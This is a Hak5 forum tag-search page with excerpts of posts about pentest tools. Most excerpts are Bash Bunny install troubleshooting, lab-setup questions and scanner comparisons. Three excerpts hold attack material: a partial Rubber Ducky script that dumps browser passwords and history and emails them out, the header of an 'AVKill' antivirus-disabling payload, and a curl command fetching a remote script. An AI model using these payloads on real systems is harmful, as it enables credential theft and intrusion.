Jump to content

Search the Community

Showing results for tags 'tools'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Enter a five letter word.

  1. Hello all, I'm currently in my last year of a "Networking & Security" study in The Netherlands. To finish my education I'm currently working on a graduation project where I'm looking to set-up a "system" that, when a SALT state has been altered, runs this on a test machine which then runs a security compliance scan (based on predefined baselines (like SCAP or XCCF)) or a vulnerability (CVE's) scan on the "new" configuration. For this I've been looking at existing tools that perform these types of scans (OpenSCAP, CIS-CAT, Nessus, OpenVas), but I was wondering if any of you know
  2. Hi all, Does anyone have experience with getting a Metasploitable3 VM up and running in Proxmox VE? I'd prefer not to run VirtualBox if I can avoid it, and Proxmox has been awesome for everything else I've done in a lab environment. Alternately, is there a package that can be run against a vanilla windows 2008 server and / or ubuntu 14.04 server to set it up as a Metasploitable3 target? Thanks
  3. I'm trying to install impacket and responder to my BB using the .deb files provided on another thread however, my bunny doesn't seem to recognise the updated tools folder. When I copy the files, eject and plug back in, it just boots as normal and doesn't copy anything to its /tools on its linux partition. I found a previous thread saying to delete the everything, change the version.txt file to an earlier version and run the updater but I don't wanna mess it up any more than it already is. I've tried restoring by inducing 3 failed boots to restore to factory but that hasn't seemed to
  4. I am looking to do some pen testing qualifications in the near future. I am really interested in buying some of the tool kits offered on the HAK5 Shop but just wanted to know if there are any laws for Japan that would not allow tools like this?
  5. Phil.P

    Python Tools

    Hi, I can see from the requiretool.sh that you can see REQUIRETOOL impacket if you wanted the impacket tool to be installed. So to install python3 I assume it would be REQUIRETOOL python3 now say a tool requires pip install, how would this work? pip install xxxx Any help greatly appreaciated.
  6. Hey, I have made a group to build, programs, tools, payloads, etc. If you have an idea or want to commute just take a look at the GitHub: https://github.com/CIPH3R0/C1PH3R C1PH3R
  7. On firmware 1.5, what is the proper tools directory to be placing tools like responder, metasploit, impacket, etc in ??? Is it /root/tools or /tools ? I installed metasploit, responder, and impacket in /root/tools and I am wondering if that is the proper location. Seeing as how the structure has changed from firmware to firmware.
  8. Hey, I have made a group to build, programs, tools, payloads, etc. If you have an idea or want to commute just take a look at the GitHub: https://github.com/CIPH3R0/C1PH3R C1PH3R
  9. After following the guide for 'unblocking' my bash bunny, I have been unable to install any of the tools. I have verified the tools are not installed by looking in the tools folder on the lines side and using payloads that require specific tools like Responder. I've gone through the standard instructions for installing tools... put the bash dummy in arming mode, transfer the files into the 'tools' folder, safely eject, and reinsert while still in arming mode. When I do this, the bash bunny just boots like normal. The led never goes magenta and the files are still in the 'tools' folder.
  10. REDD

    [PAYLOAD] AVKill

    Eh, I haven't been too active in awhile due to work so I figured I'd post one from my collection. AVKill - BashBunny -Ar1k88 This script was based off the Metasploit ruby code of "avkill". I just rewrote it for BashBunny. Payload.txt #!/bin/bash # # Title: AVKill # Author: Ar1k88 # Version: 1.2.1 # Target: Windows 7-10 # # O===================O=================== # | Magenta | Setup # | Yellow | Excuting Script # | Green/Success | Script Completed # | Cyan | Cleaning Up/ # | | | Shut
  11. Guys I just got my BB and I updated it to the latest firmware and I downloaded all the payloads but none of them works (more specifically they create an empty folder in "loots" with the name of the payload )... I assumed it was because I didn't have any tools.... so I downloaded all of the tools from the " hak5 forums" ... and in order for the tools to install I should unplug and plug my BB in arming mode again) but every time I open my " tools " folder in my BB it's empty ( despite I downloaded them several times) ...what is the problem?.... what should I do? PS ( I'm working with windo
  12. Guys I downloaded all the 3 tools in the forum but I don't know if they are installed or not and by the way non of the payloads are working
  13. for some reason when i ssh into my bashbunny i noticed my tools folder looks odd along with the layout of the rest of the bashbunny and now for some reason i cannot install tools when i place something in the tools folder and attempt to install like i normally used to nothing happens and what i placed in the tools folder stays i tried doing a factory reset yet i still get the exact same results and im still unable to install any tools like impacket or responder
  14. Harllen Dias

    Tools

    boa tarde, estou com dificuldades para instalar as ferramentas o meu Bash bunny, copiei os arquivos .deb para tools mas não instala quando conecto em modo armamento os arquivos ainda estão lá, o Firmware v1.3 esta instalado. desculpe pelo ingles
  15. I have not had any success with my bash bunny since I bought it on the day it launched. Install tools has never worked, no matter what workarounds have been posted to try. The payloads dont execute properly with the exception of a couple ducky payloads that executed a few times with issues. Now even the ducky script payloads fail to respond. I get no lights at all when trying to run the install tools payload. I would like to speak with someone about a replacement. This device has never worked and it does not behave at all like the readme files state it should. I fought with it so long that I j
  16. I'm creating this thread for myself and others that are newish to the Pineapple, Openwrt, CLI and linux. Please apply salt as this will probably be an ongoing thread. I tend to jump the gun with garishly heavy hands, often accompanied with moith feet. I come from a background of outsourcing, photography and color correction. None of which speak Linux or networking and nary a command line. (I did create a batch file once that deletes massive Lightroom catalogs in minutes; doesn't count though). I learn quickly but it's been slightly more than hairy. here are some of the Linux tools t
  17. This is a modified version of MrGray's script to get passwords from a pc (Original). This version doesn't require an extra usb, but it does require a online server hosting a zip with the tools. CODE ------------------------------------------------------- REM Created by BertFast REM Gets passwords and data from pc and emails them DELAY 500 GUI d DELAY 200 GUI r DELAY 300 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 3000 LEFT ENTER DELAY 500 STRING powershell & cd %TEMP%\tools & BrowsingHistoryView.exe /stext logs\BrowsingHistoryView.txt & C
  18. I have been running the payload to install the tools for the bashbunny but it is not working. It doesn't turn on the led at first and then it flashes a white light and it boots normally. After it boots there is no tools folder and the install.sh file doesn't change to INSTALLED. Is there anyway I can fix this or is there another way to install the tools?
  19. Hello everybody! It is my first post here. I'm new to this forum and I just wanted to show off some of my video tutorials on YouTube. I hope they will help some beginer ethical hackers. :) If there is something wrong in my video or in my post, please write it down. Thanks.
  20. Please see the official Hak5 tools sticky It seems like quite a few folks are having some trouble getting impacket and responder installed since the firmware v1.1 update. Here is a dead simple script that you can run on your BashBunny to install the two most commonly used tools in the currently published payloads. Steps Setup your BashBunny to share internet with your host machine, then SSH into the bunny. Ensure it has an internet connection. I prefer a simple ping to 4.2.2.2 Run the following command curl -k https://scripts.10ninetysix.com/bb/git
  21. I recently upgraded the bash bunny to version 1.3_264 After following the install tools method, the tools don't appear in /tools. I first downloaded the tools, put them in the tools folder of the bash bunny while it was in arming mode. Plug it back in again on arming mode, the magenta LED display as it is meant to. After this process finished, there were no tools to speak of in the /tools folder in root via SSH. Therefore, QuickCreds won't work. Any ideas? Thanks.
  22. Hi all, im undergoing a project to determine which penetration testing tools are better suited for information gathering when using Kali to attack a Metapsloitable 2 machine and a Windows XP SP3 machine. All of this research and testing is focusing on users with limited knowledge who may be just starting out in terms of testing tools. The three tools that were chosen to compare were Nmap, Unicornscan and Dmitry and the returned results were as follows: Metasploitable 2 Windows XP Nmap 23 3
  23. Hi all, i'm undertaking a project to determine which vulnerability scanning tools within Kali Linux are best suited for the job, there were three tools tested and these were, Nikto, Sparta and OpenVAS. The results that these scans returned when scanning metasploitable 2 with a Kali linux machine are as follows: Metasploitable 2 Nikto 15 Sparta 46 OpenVAS 144 These results are solely the number of vulnerabilities that were returned, OpenVAS seems to be the right cho
  24. Hi all, One of my colleagues managed to lose the key for his desk today. We therefore had to 'improvise' to get it open. Thought I'd share this website, as it's a fantastic resource for lock picking tips, tricks and home-made tools. Check out all of the pages listed at the bottom of the site, under 'Links & Notes'. Enjoy.
  25. Hi Guys I just want to know what tools and technics are you guys using as windows admin to tackel everyday works loads iin your enviroment and what recommendation that you have for me a person who is new at windows administration work. Tools for local and admin (Troubleshooting locally on PC) Tools for remote admin Tools for monitoring user activity on PC Tools for Network monitory and others And yes can you guys provide some cool tools for helping making life easy with AD(Active Direcotry). my understanding of AD is very low as i have just started to work in an enterprise enviroment i am i
×
×
  • Create New...